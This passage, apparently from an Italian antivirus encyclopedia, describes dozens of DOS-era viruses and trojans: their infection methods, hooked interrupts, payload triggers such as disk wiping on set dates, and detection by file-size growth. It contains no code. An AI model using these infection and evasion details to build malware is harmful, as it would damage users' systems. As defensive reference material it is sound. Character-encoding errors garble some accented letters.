rilevazione: I file infetti aumentano di 477 Byte. Note: Highland non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [CMDR] Nome del Virus: CMDR. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 4.096 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h) (programma eseguibile). Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 4096 Byte. Note: Il virus CMDR non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [POX] Nome del Virus: POX. Tipo di Virus: In memoria alta, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 609 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 9h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: POX intercetta l'INT 9h, quando viene premuto il tasto <Delete>. Il virus controlla la data di sistema; se Φ il giorno 24, formatta l' hard disk. Metodo di rilevazione: I file infetti aumentano di 609 Byte. Note: Il virus POX non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [SBC-1] Nome del Virus: SBC-1. Tipo di Virus: In memoria alta, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: Nessuna variazione. Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile). Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Controlla che il file "COMMAND.COM" sia stato infettato. Se "NO", infetta il file. 3) Esegue il file originale. 4) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Sovrascrive il file originale cos∞ i file infetti non aumentano di lunghezza. Metodo di rilevazione: Nessuno. Note: Il virus SBC-1 non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Nov_17-1] Nome del Virus: NOV_17-1. Tipo di Virus: In memoria alta, Virus da file i file con estensione *.EXE e *.COM ). Lunghezza del Virus: 768 (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile). Metodo di infezione: 1) Questo virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 768 Byte. Note: NOV_17-1 non intercetta l'INT 24h mentre infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [HBT] Nome del Virus: HBT. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 394 Byte (COM ed6 EXE). Vettore PC agganciato: INT 21h (AX=4B00h) (Programma eseguibile). Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Quando il virus Φ in memoria, un file non pu≥ essere eseguito, ma solo infettato. Metodo di rilevazione: I file infetti aumentano di 394 Byte. Note: HBT non intercetta l'INT 24h quando infetta il file. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [Gotcha] Nome del Virus: GOTCHA. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 906 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. 4) Infetta quando viene rinominato o cancellato un file, quando vengono cambiati gli attributi di un file, oppure nel caso in cui si effettui una ricerca di file. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 906 Byte. Note: Quando infetta i file Gotcha intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Voronezh-2] Nome del Virus: VORONEZH-2. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 1.600 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.600 Byte. Note: Quando infetta i file Voronezh-2 intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Amilia] Nome del Virus: AMILIA. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.614 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: 1) Se Φ domenica, appare un messaggio sullo schermo: "Amilia I virii - [NUKE] 1991 By Rock Steady/NUKE," quindi il sistema si blocca. 2) Se l'ora Φ compresa tra le 16 e le 17, una faccia sorridente appare sullo schermo. Metodo di rilevazione: 1) I file infetti aumentano di 1.614 Byte. 2) Una faccia sorridente appare sullo schermo. Note: Quando infetta i file, Amilia intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [981] Nome del Virus: 981. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 981 Byte (COM), circa 1.010 Byte (EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla la versione del DOS; se la versione del DOS Φ pi∙ recente della 3.0 mostrerα il messaggio: " This program requires MS-DOS 3.0 or later." 2) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file con estensione *.COM infetti aumentano di 981 Byte e quelli con estensione *.EXE aumentano di 1.010 Byte. Note: Quando infetta i file, 981 intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [Gotcha-2] Nome del Virus: GOTCHA-2. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 627 Byte (COM), 527 Byte (EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. a) Prima infetta un file, poi controlla il nome del file. Danni: Nessuno. Metodo di rilevazione: I file con estensione *.COM infetti aumentano di 627 Byte e quelli con estensione *.EXE aumentano di 527 Byte. Note: Quando infetta i file, Gotcha-2 intercetta l'INT 24h e chiude la funzione "control_break". Omette gli errori I/O (come per esempio protetto da scrittura). [Hungarian] Nome del Virus: HUNGARIAN. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 749 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h, INT 8h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Se l'anno Φ il 1990 e il mese compreso tra giugno e dicembre, intercetta l'INT 8h. 3) Esegue il file originale. 4) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Quando Hungarian intercetta l'INT 8h, azzera il contatore su 0xFFFF. Ogni volta che Φ chiamato l'INT 8h, il contatore diminuisce di uno. Quando il contatore Φ a zero (dopo circa un ora), comincia a distruggere file. Ogni file eseguito viene distrutto. Metodo di rilevazione: I file infetti aumentano di 749 Byte. Note: Quando infetta i file, Hungarian intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [CK] Nome del Virus: CK. Tipo di Virus: In memoria, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 1.163 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h, INT 13h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Il virus intercetta l'INT 13h; poco tempo dopo, il sistema produce dei suoni. Metodo di rilevazione: I file infetti aumentano di 1.163 Byte. Note: Quando infetta i file, CK intercetta l'INT 24h. Omette gli errori I/O (come per esempio protetto da scrittura). [2136] Nome del Virus: 2136. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 2.136 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 2.136 Byte. Note: Quando infetta i file, 2136 intercetta l'INT 24h. Omette gli errori I/O (come protetto da scrittura). [Casteggi] Nome del Virus: CASTEGGI. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 2.881 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h, INT 1Ch. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Quando il giorno del mese Φ successivo al giorno 10, il virus conteggia l'ora intercettando l'INT 1Ch. Circa 6 minuti dopo, l'immagine sullo schermo viene distrutta. Metodo di rilevazione: I file infetti aumentano di 2.881 Byte. Note: Il virus Casteggi intercetta l'INT 24h quando infetta i file. Omette l'errore I/O (come per esempio protetto da scrittura). [Enola] Nome del Virus: ENOLA. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM ed *.EXE). Lunghezza del Virus: 1.865-1.875 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h, INT 8h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria sarα infettato ogni file non infetto eseguito.. Danni: Quando il virus Φ in memoria da 140 minuti e l'INT 21h Φ stato chiamato pi∙ di 72 volte, vengono distrutti tutti i dati presenti sull'hard disk. Metodo di rilevazione: I file infetti aumentano di 1.865-1.875 Byte. Note: Il virus Enola intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Ontari03] Nome del Virus: ONTARI03. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 2.048 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno Metodo di rilevazione: I file infetti aumentano di 2.048 Byte. Note: Il virus Ontari03 intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [PCBB-B] Nome del Virus: PCBB-B. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 3.072 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 3.072 Byte. Note: Il virus PCBB intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Canna615] Nome del Virus: CANNA615. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE e *.COM). Lunghezza del Virus: 1.568 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Il virus controlla che la data di sistema sia venerd∞ ed i secondi siano zero. Se "SI", compaiono sullo schermo il messaggio: "LEGALIZE CANNA615" e l'immagine di una foglia di marjuana. 3) Esegue il file originale. 4) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.568 Byte. Note: Il virus Canna615 intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Magnum] Nome del Virus: MAGNUM. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 2.560 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT24h, INT 8h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 2.560 Byte. Note: 1) Il virus Magnum intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). 2) Il virus gira solo in DOS 3.3. [Lycee] Nome del Virus: LYCEE. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 1.788 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h) (Programma eseguibile), INT 24h, INT 8h, INT 9h. Procedura eseguita: 1) Controlla che sia in memoria. Se "NO", intercetta l'INT 21h, l'INT 8h e l'INT 9h, si installa in memoria ed esegue quindi il programma ospite. 2) Se il virus Φ ancora in memoria, esegue il programma principale. Metodo di infezione: 1) Il virus infetta i file AH=4B nell'INT 21h. Un programma non infetto viene infettato alla sua esecuzione. 2) Lycee intercetta l'INT 24h prima di infettare i file per ignorare gli errori di I/O. Danni: Se non si premono tasti per un po' di tempo appare sullo schermo una piccola finestra finchΘ non viene premuto un tasto. Metodo di rilevazione: I file infetti aumentano di 1.788 Byte. Note: Lycee intercetta l'INT 24h quando infetta i file. Omette l'errore I/O (come per esempio protetto da scrittura). Commenti: Il virus non Φ conteggiato dall'INT 8h. Quando la tastiera non viene toccata per un certo periodo, appare sullo schermo una piccola finestra finchΘ non viene premuto un tasto. [Brain2] Nome del Virus: BRAIN2. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM e *.EXE). Lunghezza del Virus: 1.935 Byte (COM ed EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h, INT 1Ch. Metodo di infezione: 1) Controlla che la data di sistema corrisponda al giorno 17 novembre o 6 febbraio. Se "SI", mostra alcuni messaggi e suona una musica. 2) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT21h. 3) Esegue il file originale. 4) Controlla che la data di sistema corrisponda al primo di febbraio, luglio, settembre o dicembre. Se "SI", il virus mostra un rettangolo lampeggiante agganciandosi all'INT 1Ch. 5) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.935 Byte. Note: Brain2 intercetta l'INT 24h quando infetta i file. Omette l'errore I/O (come per esempio protetto da scrittura). [Antiprnt] Nome del Virus: ANTIPRNT. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE). Lunghezza del Virus: 593 Byte (EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. Danni: Se la versione del DOS Φ pi∙ recente della 3.0 e la stampante Φ installata, il virus distrugge i dati sul disco in uso. Metodo di rilevazione: I file infetti aumentano di 593 Byte. Note: ANTIPRNT intercetta l'INT 24h quando infetta i file. Omette l'errore I/O (come per esempio protetto da scrittura). [ABC] Nome del Virus: ABC. Tipo di Virus: In memoria alta, Virus da file (Infetta i file con estensione *.EXE). Lunghezza del Virus: 2.912 Byte (EXE). Vettore PC agganciato: INT 21h (AX=4B00h) (Programma eseguibile), INT 24h, INT 1Ch, INT 16h. Metodo di infezione: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) intercettando l'INT 21h, INT 1Ch, INT 16h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.COM ed i file con estensione *.EXE pi∙ piccoli di 20KB. Danni: Quando la data di sistema corrisponde al giorno 14, ed il virus Φ in memoria da 55 minuti, distrugge tutti i dati dell'hard disk. Metodo di rilevazione: I file infetti aumentano di 2.912 Byte. Note: ABC intercetta l'INT 24h quando infetta i file. Omette l'errore I/O (come per esempio protetto da scrittura). [CivilWar] Nome del Virus: Civilwar. Tipo di Virus: In memoria alta, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 599 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria (memoria alta) i ntercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 599 Byte. Note: Civilwar intercetta l'INT 24h quando infetta i file. Omette l'errore I/O (come per esempio protetto da scrittura). [Leech] Nome del Virus: Leech. Tipo di Virus: In memoria alta, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 1.024 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 1.024 Byte. Note: Leech intercetta l'INT 24h quando infetta i file. Omette l'errore I/O (come per esempio protetto da scrittura). [302] Nome del Virus: 302. Tipo di Virus: In memoria alta, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 302 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h) (Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 302 Byte. Note: 302 intercetta l'INT 24h quando infetta i file. Omette l'errore I/O (come per esempio protetto da scrittura). [Little_Brother] Nome del Virus: Little_Brother. Tipo di Virus: In memoria, Virus da file (Companion Virus). Lunghezza del Virus: 250 Byte (EXE). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.COM. Danni: Quando viene eseguito un file non infetto, il virus crea un file con estensione *.COM chiamandolo come un file con estensione *.EXE (esempio: gira "AAA.EXE", Little_Brother creerα "AAA.COM"). Metodo di rilevazione: I file infetti aumentano di 250 Byte. Note: Little_Brother intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [ARCV-9] Nome del Virus: ARCV-9. Tipo di Virus: In memoria alta, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 771 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h) (execute program), INT 24h. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 771 Byte. Note: ARCV-9 intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [NG-914] Nome del Virus: NG-914. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 914 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h) (Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 914 Byte. Note: NG-914 intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Civil510] Nome del Virus: Civil510. Tipo di Virus: In memoria alta, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 2.080 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h) (Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus caricato in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 2.080 Byte. Note: Civil510 intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [B3] Nome del Virus: B3. Tipo di Virus: In memoria, Virus da file (infetta i file con estensione *.COM). Lunghezza del Virus: 483 Byte (COM). Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che la data di sistema corrisponda al giorno 26 giugno. Se "SI", distrugge tutti i dati sull'hard disk. Se "NO", il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.EXE. Danni: Se la data di sistema Φ il giorno 26 giugno, il virus distrugge tutti i dati sull'hard disk. Metodo di rilevazione: I file infetti aumentano di 483 Byte. Note: B3 intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [RKO-1] Nome del Virus: RKO-1. Tipo di Virus: In memoria, Virus da file. Lunghezza del Virus: Nessuna Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che la data di sistema corrisponda al giorno 13. Se "SI", distrugge tutti i dati sull'hard disk. Se "NO", il virus controlla che sia giα in memoria. Se "NO", si carica nella in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito o quando INT 21h Φ chiamato da AX=11h o AX=12h. Danni: Se la data di sistema corrisponde al giorno 13, il virus distrugge tutti i dati sull'hard disk. Metodo di rilevazione: Nessuno. Note: RKO-1 intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Dame] Nome del Virus: Dame. Tipo di Virus: In memoria, Virus da file (Mutation Engine). Lunghezza del Virus: Nessuna. Vettore PC agganciato: INT 21h (AX=4B00h)(Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria agganciando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. 4) Dopo aver infettato i file, controlla l'ora. Se questa Φ compresa tra le 12:00 e le 12:30, il virus mostra il messaggio: "Don't worry, you are not alone at this hour.... This Virus is NOT dedicated to Sara. It's dedicated to her Groove (...That s my name).. This Virus is only a test therefor .. be ready for my Next Test..." Danni: Nessuno. Metodo di rilevazione: Nessuno. Note: 1) Dame intercetta l'INT 24h quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). 2) Il virus si codifica prima di infettare i file. Il metodo di decodificazione dipende dall'ora quindi Φ diverso in ogni file. [7thson] Nome del Virus: 7thson. Tipo di Virus: In memoria, Virus da file (Companion). Lunghezza del Virus: 321 o 307 Byte (EXE). Vettore PC agganciato: INT 21h (AX=4B00h) (Programma eseguibile), INT 24h. Procedura eseguita: 1) Il virus controlla che sia giα in memoria. Se "NO", si carica in memoria intercettando l'INT 21h. 2) Esegue il file originale. 3) Con il virus in memoria viene infettato ogni file non infetto eseguito. b) Non infetta i file con estensione *.COM. Danni: Quando gira un file con estensione *.EXE, il virus crea un nuovo file con estensione *.COM della lunghezza di 321 o 307 Byte chiamandolo con lo stesso nome di un file con estensione *.EXE. Metodo di rilevazione: Controlla che vi siano dei file con estensione *.COM della lunghezza di 321 o 307 Byte. Note: 7thson intercetta l'INT 24h e chiude il comando "control_break" quando infetta i file. Omette gli errori I/O (come per esempio protetto da scrittura). [Geoff] Nome del Virus: Geoff. Tipo di Virus: Trojan. Lunghezza del Virus: 5.952 Byte. Vettore PC agganciato: INT 24h. Procedura eseguita: 1) Non infetta ogni file, parte o settore di boot. 2) Prima di distruggere fa comparire il messaggio: "Search And Destroy Loading v1.0 Bringing The Best And Latest Warex....... Press [ENTER] to Start The Game." 3) Distrugge quindi tutti i dati di ogni disco, se i drive sono pronti. 4) Effettuata la distruzione compare il messaggio: "Hey Geoff You know what happened a few days ago? Some friend asked me to get rid of you,........ P.S. I have nothing personal against you! You just FUCKED with the Cold Brother and I had to take you down, again." Danni: Distrugge tutti i dati di ogni disco, se i drive sono pronti. Metodo di rilevazione: Ricerca i file di lunghezza pari a 5.952 Byte. Note: 1) Non rimane in memoria. 2) Geoff intercetta l'INT 24h mentre distrugge. Omette gli errori I/O (come per esempio protetto da scrittura). [CMOSKill] Nome del Virus: Cmoskill. Tipo di Virus: Trojan. Lunghezza del Virus: 29 Byte. Vettore PC agganciato: Nessuno. Danni: Cancella tutti i dati CMOS. Metodo di rilevazione: Nessuno. Note: 1) Non rimane in memoria. 2) Non infetta file, partizione o settore di boot. [Killboot] Nome del Virus: Killboot. Tipo di Virus: Trojan. Lunghezza del Virus: 32.000 Byte. Vettore PC agganciato: Nessuno. Danni: Distrugge tutti i dati del settore BOOT di C:\ e B:\, compare quindi una riga di codici ed il sistema si blocca. Metodo di rilevazione: Nessuno. Note: 1) Non rimane in memoria. 2) Non infetta file o partizione. [NUKEX] Nome del Virus: NUKEX. Tipo di Virus: Trojan. Lunghezza del Virus: 469 Byte. Vettore PC agganciato: Nessuno. Danni: Cancella tutti i file sull'hard disk (comprese tutte le subdirectory). Metodo di rilevazione: Nessuno. Note: 1) Non rimane in memoria. 2) Non infetta file, partizione o settore di boot. [Fire] Nome del Virus: Fire. Tipo di Virus: Trojan. Lunghezza del Virus: 4.304 Byte. Vettore PC agganciato: INT 24h. Danni: Distrugge tutti i dati di ogni disco, se i drive sono pronti, producendo poi un suono. Metodo di rilevazione: Ricerca file della lunghezza di 4.304 Byte. Note: 1) Non rimane in memoria. 2) Non infetta file, partizione o settore di boot. 3) Fire intercetta l'INT 24h mentre distrugge. Omette gli errori I/O (come per esempio protetto da scrittura). [Secto] Nome del Virus: Secto. Tipo di Virus: Trojan. Lunghezza del Virus: 487 Byte. Vettore PC agganciato: Nessuno. Danni: Distrugge tutti i dati del settore boot di A:\. Metodo di rilevazione: Nessuno. Note: 1) Non rimane in memoria. 2) Non infetta file o partizione. 3) Non intercetta l'INT 24h mentre distrugge. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [MSK] Nome del Virus: MSK. Tipo di Virus: Trojan. Lunghezza del Virus: 272 Byte. Vettore PC agganciato: Nessuno. Danni: Distrugge tutti i dati sull'hard disk. Metodo di rilevazione: Ricerca i file di lunghezza pari a 272 Byte. Note: 1) Non rimane in memoria. 2) Non infetta file, partizione o settore di boot. [Dropper] Nome del Virus: Dropper. Tipo di Virus: Trojan. Lunghezza del Virus: 3.103 Byte. Vettore PC agganciato: Nessuno. Danni: Cancella tutti i file dei dischi. Metodo di rilevazione: Controlla che vi siano file di lunghezza pari a 3.103 Byte. Note: 1) Non rimane in memoria. 2) Non infetta file, partizione o settore di boot. 3) Dropper non intercetta l'INT 24h mentre distrugge. Appare un messaggio d'errore in caso ci sia un errore di I/O (come per esempio protetto da scrittura). [RNA#1] Nome del Virus: 